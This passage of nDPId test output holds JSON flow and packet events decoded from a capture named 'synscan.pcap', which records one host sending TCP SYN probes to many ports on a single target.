+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHIAACwGdACsEAAIQA2GNIzTJr3dU4MZAAAAAGACBAANzwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstK4AADUGXsSsEAAIQA2GNIzTBR\/dU4MZAAAAAGACCAArbQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsP4IAACcG4fCsEAAIQA2GNIzTBN\/dU4MZAAAAAGACEAAjrQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstAIAAC8GZXCsEAAIQA2GNIzTOGrdU4MZAAAAAGACEADwIQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLAAADoGRcKsEAAIQA2GNIzTHfzdU4MZAAAAAGACDAAOkAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzThGvdU4MZAAAAAGACDACoIAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsv88AADcGUaOsEAAIQA2GNIzTD6PdU4MZAAAAAGACEAAY6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFdcAACkGCZysEAAIQA2GNIzTBCvdU4MZAAAAAGACCAAsYQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAspR4AACUGflSsEAAIQA2GNIzTFw\/dU4MZAAAAAGACCAAZfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZasAADQGrsesEAAIQA2GNIzTI\/DdU4MZAAAAAGACBAAQnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAYwAADEGFeesEAAIQA2GNIzTB9XdU4MZAAAAAGACCAAotwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACcGEU6sEAAIQA2GNIzTA0vdU4MZAAAAAGACEAAlQQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsXIoAADgGs+isEAAIQA2GNIzTCo3dU4MZAAAAAGACBAAp\/wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsG+YAACwGAI2sEAAIQA2GNIzTBRTdU4MZAAAAAGACBAAveAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsNr8AACkG6LOsEAAIQA2GNIzTBDPdU4MZAAAAAGACCAAsWQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs4koAACcGPyisEAAIQA2GNIzTI47dU4MZAAAAAGACEAAE\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs28oAADsGMaisEAAIQA2GNIzTBRDdU4MZAAAAAGACEAAjfAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsncwAAC0GfaasEAAIQA2GNIzTE+3dU4MZAAAAAGACCAAcnwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnGIAACgGhBCsEAAIQA2GNIzTABjdU4MZAAAAAGACBAA0dAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs8\/oAACkGK3isEAAIQA2GNIzTznDdU4MZAAAAAGACCABiGwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsbGUAAC4Grg2sEAAIQA2GNIzTOpzdU4MZAAAAAGACDADx7wAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AACsGFySsEAAIQA2GNIzTACDdU4MZAAAAAGACEAAobAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNgIAAC8G43CsEAAIQA2GNIzTKYLdU4MZAAAAAGACEAD\/CQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUwAACgGCyesEAAIQA2GNIzTBADdU4MZAAAAAGACBAAwjAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsZxkAADgGqVmsEAAIQA2GNIzTFr7dU4MZAAAAAGACBAAdzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 